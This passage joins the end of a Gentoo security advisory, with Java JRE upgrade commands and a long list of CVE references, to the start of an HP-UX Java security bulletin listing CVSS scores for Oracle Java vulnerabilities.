# emerge --ask --oneshot -v ">=dev-java/oracle-jre-bin-1.7.0.51"
All users of the precompiled 32-bit Oracle JRE should upgrade to the
latest version:
# emerge --sync
# emerge -a -1 -v ">=app-emulation/emul-linux-x86-java-1.7.0.51"
All Sun Microsystems JDK/JRE 1.6 users are suggested to upgrade to one
of the newer Oracle packages like dev-java/oracle-jdk-bin or
dev-java/oracle-jre-bin or choose another alternative we provide; eg.
the IBM JDK/JRE or the open source IcedTea.
References
==========
[ 1 ] CVE-2011-3563
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3563
[ 2 ] CVE-2011-5035
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-5035
[ 3 ] CVE-2012-0497
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0497
[ 4 ] CVE-2012-0498
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0498
[ 5 ] CVE-2012-0499
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0499
[ 6 ] CVE-2012-0500
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0500
[ 7 ] CVE-2012-0501
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0501
[ 8 ] CVE-2012-0502
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0502
[ 9 ] CVE-2012-0503
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0503
[ 10 ] CVE-2012-0504
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0504
[ 11 ] CVE-2012-0505
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0505
[ 12 ] CVE-2012-0506
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0506
[ 13 ] CVE-2012-0507
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0507
[ 14 ] CVE-2012-0547
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0547
[ 15 ] CVE-2012-1531
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1531
[ 16 ] CVE-2012-1532
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1532
[ 17 ] CVE-2012-1533
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1533
[ 18 ] CVE-2012-1541
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1541
[ 19 ] CVE-2012-1682
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1682
[ 20 ] CVE-2012-1711
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1711
[ 21 ] CVE-2012-1713
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1713
[ 22 ] CVE-2012-1716
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1716
[ 23 ] CVE-2012-1717
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1717
[ 24 ] CVE-2012-1718
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1718
[ 25 ] CVE-2012-1719
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1719
[ 26 ] CVE-2012-1721
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1721
[ 27 ] CVE-2012-1722
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1722
[ 28 ] CVE-2012-1723
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1723
[ 29 ] CVE-2012-1724
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1724
[ 30 ] CVE-2012-1725
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1725
[ 31 ] CVE-2012-1726
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1726
[ 32 ] CVE-2012-3136
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3136
[ 33 ] CVE-2012-3143
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3143
[ 34 ] CVE-2012-3159
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3159
[ 35 ] CVE-2012-3174
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3174
[ 36 ] CVE-2012-3213
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3213
[ 37 ] CVE-2012-3216
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3216
[ 38 ] CVE-2012-3342
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3342
[ 39 ] CVE-2012-4416
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4416
[ 40 ] CVE-2012-4681
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4681
[ 41 ] CVE-2012-5067
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5067
[ 42 ] CVE-2012-5068
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5068
[ 43 ] CVE-2012-5069
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5069
[ 44 ] CVE-2012-5070
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5070
[ 45 ] CVE-2012-5071
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5071
[ 46 ] CVE-2012-5072
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5072
[ 47 ] CVE-2012-5073
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5073
[ 48 ] CVE-2012-5074
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5074
[ 49 ] CVE-2012-5075
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5075
[ 50 ] CVE-2012-5076
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5076
[ 51 ] CVE-2012-5077
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5077
[ 52 ] CVE-2012-5079
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5079
[ 53 ] CVE-2012-5081
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5081
[ 54 ] CVE-2012-5083
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5083
[ 55 ] CVE-2012-5084
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5084
[ 56 ] CVE-2012-5085
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5085
[ 57 ] CVE-2012-5086
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5086
[ 58 ] CVE-2012-5087
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5087
[ 59 ] CVE-2012-5088
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5088
[ 60 ] CVE-2012-5089
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5089
[ 61 ] CVE-2013-0169
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0169
[ 62 ] CVE-2013-0351
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0351
[ 63 ] CVE-2013-0401
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0401
[ 64 ] CVE-2013-0402
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0402
[ 65 ] CVE-2013-0409
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0409
[ 66 ] CVE-2013-0419
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0419
[ 67 ] CVE-2013-0422
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0422
[ 68 ] CVE-2013-0423
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0423
[ 69 ] CVE-2013-0430
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0430
[ 70 ] CVE-2013-0437
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0437
[ 71 ] CVE-2013-0438
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0438
[ 72 ] CVE-2013-0445
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0445
[ 73 ] CVE-2013-0446
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0446
[ 74 ] CVE-2013-0448
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0448
[ 75 ] CVE-2013-0449
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0449
[ 76 ] CVE-2013-0809
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0809
[ 77 ] CVE-2013-1473
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1473
[ 78 ] CVE-2013-1479
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1479
[ 79 ] CVE-2013-1481
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1481
[ 80 ] CVE-2013-1484
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1484
[ 81 ] CVE-2013-1485
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1485
[ 82 ] CVE-2013-1486
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1486
[ 83 ] CVE-2013-1487
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1487
[ 84 ] CVE-2013-1488
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1488
[ 85 ] CVE-2013-1491
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1491
[ 86 ] CVE-2013-1493
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1493
[ 87 ] CVE-2013-1500
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1500
[ 88 ] CVE-2013-1518
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1518
[ 89 ] CVE-2013-1537
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1537
[ 90 ] CVE-2013-1540
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1540
[ 91 ] CVE-2013-1557
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1557
[ 92 ] CVE-2013-1558
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1558
[ 93 ] CVE-2013-1561
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1561
[ 94 ] CVE-2013-1563
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1563
[ 95 ] CVE-2013-1564
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1564
[ 96 ] CVE-2013-1569
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1569
[ 97 ] CVE-2013-1571
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1571
[ 98 ] CVE-2013-2383
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2383
[ 99 ] CVE-2013-2384
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2384
[ 100 ] CVE-2013-2394
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2394
[ 101 ] CVE-2013-2400
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2400
[ 102 ] CVE-2013-2407
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2407
[ 103 ] CVE-2013-2412
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2412
[ 104 ] CVE-2013-2414
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2414
[ 105 ] CVE-2013-2415
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2415
[ 106 ] CVE-2013-2416
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2416
[ 107 ] CVE-2013-2417
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2417
[ 108 ] CVE-2013-2418
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2418
[ 109 ] CVE-2013-2419
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2419
[ 110 ] CVE-2013-2420
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2420
[ 111 ] CVE-2013-2421
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2421
[ 112 ] CVE-2013-2422
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2422
[ 113 ] CVE-2013-2423
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2423
[ 114 ] CVE-2013-2424
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2424
[ 115 ] CVE-2013-2425
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2425
[ 116 ] CVE-2013-2426
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2426
[ 117 ] CVE-2013-2427
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2427
[ 118 ] CVE-2013-2428
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2428
[ 119 ] CVE-2013-2429
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2429
[ 120 ] CVE-2013-2430
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2430
[ 121 ] CVE-2013-2431
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2431
[ 122 ] CVE-2013-2432
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2432
[ 123 ] CVE-2013-2433
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2433
[ 124 ] CVE-2013-2434
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2434
[ 125 ] CVE-2013-2435
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2435
[ 126 ] CVE-2013-2436
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2436
[ 127 ] CVE-2013-2437
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2437
[ 128 ] CVE-2013-2438
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2438
[ 129 ] CVE-2013-2439
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2439
[ 130 ] CVE-2013-2440
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2440
[ 131 ] CVE-2013-2442
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2442
[ 132 ] CVE-2013-2443
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2443
[ 133 ] CVE-2013-2444
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2444
[ 134 ] CVE-2013-2445
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2445
[ 135 ] CVE-2013-2446
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2446
[ 136 ] CVE-2013-2447
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2447
[ 137 ] CVE-2013-2448
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2448
[ 138 ] CVE-2013-2449
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2449
[ 139 ] CVE-2013-2450
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2450
[ 140 ] CVE-2013-2451
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2451
[ 141 ] CVE-2013-2452
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2452
[ 142 ] CVE-2013-2453
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2453
[ 143 ] CVE-2013-2454
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2454
[ 144 ] CVE-2013-2455
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2455
[ 145 ] CVE-2013-2456
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2456
[ 146 ] CVE-2013-2457
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2457
[ 147 ] CVE-2013-2458
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2458
[ 148 ] CVE-2013-2459
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2459
[ 149 ] CVE-2013-2460
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2460
[ 150 ] CVE-2013-2461
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2461
[ 151 ] CVE-2013-2462
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2462
[ 152 ] CVE-2013-2463
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2463
[ 153 ] CVE-2013-2464
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2464
[ 154 ] CVE-2013-2465
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2465
[ 155 ] CVE-2013-2466
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2466
[ 156 ] CVE-2013-2467
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2467
[ 157 ] CVE-2013-2468
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2468
[ 158 ] CVE-2013-2469
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2469
[ 159 ] CVE-2013-2470
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2470
[ 160 ] CVE-2013-2471
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2471
[ 161 ] CVE-2013-2472
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2472
[ 162 ] CVE-2013-2473
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2473
[ 163 ] CVE-2013-3743
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3743
[ 164 ] CVE-2013-3744
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3744
[ 165 ] CVE-2013-3829
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3829
[ 166 ] CVE-2013-5772
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5772
[ 167 ] CVE-2013-5774
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5774
[ 168 ] CVE-2013-5775
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5775
[ 169 ] CVE-2013-5776
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5776
[ 170 ] CVE-2013-5777
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5777
[ 171 ] CVE-2013-5778
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5778
[ 172 ] CVE-2013-5780
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5780
[ 173 ] CVE-2013-5782
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5782
[ 174 ] CVE-2013-5783
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5783
[ 175 ] CVE-2013-5784
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5784
[ 176 ] CVE-2013-5787
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5787
[ 177 ] CVE-2013-5788
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5788
[ 178 ] CVE-2013-5789
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5789
[ 179 ] CVE-2013-5790
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5790
[ 180 ] CVE-2013-5797
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5797
[ 181 ] CVE-2013-5800
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5800
[ 182 ] CVE-2013-5801
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5801
[ 183 ] CVE-2013-5802
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5802
[ 184 ] CVE-2013-5803
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5803
[ 185 ] CVE-2013-5804
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5804
[ 186 ] CVE-2013-5805
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5805
[ 187 ] CVE-2013-5806
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5806
[ 188 ] CVE-2013-5809
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5809
[ 189 ] CVE-2013-5810
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5810
[ 190 ] CVE-2013-5812
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5812
[ 191 ] CVE-2013-5814
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5814
[ 192 ] CVE-2013-5817
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5817
[ 193 ] CVE-2013-5818
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5818
[ 194 ] CVE-2013-5819
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5819
[ 195 ] CVE-2013-5820
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5820
[ 196 ] CVE-2013-5823
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5823
[ 197 ] CVE-2013-5824
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5824
[ 198 ] CVE-2013-5825
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5825
[ 199 ] CVE-2013-5829
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5829
[ 200 ] CVE-2013-5830
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5830
[ 201 ] CVE-2013-5831
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5831
[ 202 ] CVE-2013-5832
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5832
[ 203 ] CVE-2013-5838
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5838
[ 204 ] CVE-2013-5840
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5840
[ 205 ] CVE-2013-5842
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5842
[ 206 ] CVE-2013-5843
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5843
[ 207 ] CVE-2013-5844
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5844
[ 208 ] CVE-2013-5846
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5846
[ 209 ] CVE-2013-5848
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5848
[ 210 ] CVE-2013-5849
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5849
[ 211 ] CVE-2013-5850
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5850
[ 212 ] CVE-2013-5851
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5851
[ 213 ] CVE-2013-5852
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5852
[ 214 ] CVE-2013-5854
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5854
[ 215 ] CVE-2013-5870
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5870
[ 216 ] CVE-2013-5878
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5878
[ 217 ] CVE-2013-5887
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5887
[ 218 ] CVE-2013-5888
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5888
[ 219 ] CVE-2013-5889
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5889
[ 220 ] CVE-2013-5893
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5893
[ 221 ] CVE-2013-5895
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5895
[ 222 ] CVE-2013-5896
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5896
[ 223 ] CVE-2013-5898
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5898
[ 224 ] CVE-2013-5899
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5899
[ 225 ] CVE-2013-5902
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5902
[ 226 ] CVE-2013-5904
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5904
[ 227 ] CVE-2013-5905
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5905
[ 228 ] CVE-2013-5906
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5906
[ 229 ] CVE-2013-5907
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5907
[ 230 ] CVE-2013-5910
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5910
[ 231 ] CVE-2014-0368
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0368
[ 232 ] CVE-2014-0373
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0373
[ 233 ] CVE-2014-0375
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0375
[ 234 ] CVE-2014-0376
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0376
[ 235 ] CVE-2014-0382
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0382
[ 236 ] CVE-2014-0385
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0385
[ 237 ] CVE-2014-0387
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0387
[ 238 ] CVE-2014-0403
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0403
[ 239 ] CVE-2014-0408
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0408
[ 240 ] CVE-2014-0410
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0410
[ 241 ] CVE-2014-0411
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0411
[ 242 ] CVE-2014-0415
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0415
[ 243 ] CVE-2014-0416
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0416
[ 244 ] CVE-2014-0417
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0417
[ 245 ] CVE-2014-0418
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0418
[ 246 ] CVE-2014-0422
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0422
[ 247 ] CVE-2014-0423
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0423
[ 248 ] CVE-2014-0424
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0424
[ 249 ] CVE-2014-0428
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0428
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201401-30.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2014 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Note: the current version of the following document is available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/
docDisplay?docId=emr_na-c04031205
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c04031205
Version: 1
HPSBUX02943 rev.1 - HP-UX Running Java6, Remote Unauthorized Access,
Disclosure of Information, and Other Vulnerabilities
NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.
Release Date: 2013-12-04
Last Updated: 2013-12-04
Potential Security Impact: Remote unauthorized access, disclosure of
information, and other vulnerabilities
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified in the Java Runtime
Environment (JRE) and the Java Developer Kit (JDK) running on HP-UX. These
vulnerabilities could allow remote unauthorized access, disclosure of
information, and other exploits.
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP-UX B.11.11, B.11.23, and B.11.31 running HP JDK and JRE v6.0.20 and
earlier.
BACKGROUND
CVSS 2.0 Base Metrics
===========================================================
Reference Base Vector Base Score
CVE-2013-3829 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4
CVE-2013-4002 (AV:N/AC:M/Au:N/C:N/I:N/A:C) 7.1
CVE-2013-5772 (AV:N/AC:H/Au:N/C:N/I:P/A:N) 2.6
CVE-2013-5774 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0
CVE-2013-5776 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0
CVE-2013-5778 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0
CVE-2013-5780 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3
CVE-2013-5782 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-5783 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4
CVE-2013-5784 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3
CVE-2013-5787 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-5789 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-5790 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3
CVE-2013-5797 (AV:N/AC:M/Au:S/C:N/I:P/A:N) 3.5
CVE-2013-5801 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0
CVE-2013-5802 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5
CVE-2013-5803 (AV:N/AC:H/Au:N/C:N/I:N/A:P) 2.6
CVE-2013-5804 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4
CVE-2013-5809 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-5812 (AV:N/AC:L/Au:N/C:P/I:N/A:P) 6.4
CVE-2013-5814 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-5817 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-5818 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0
CVE-2013-5819 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0
CVE-2013-5820 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0
CVE-2013-5823 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2013-5824 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-5825 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
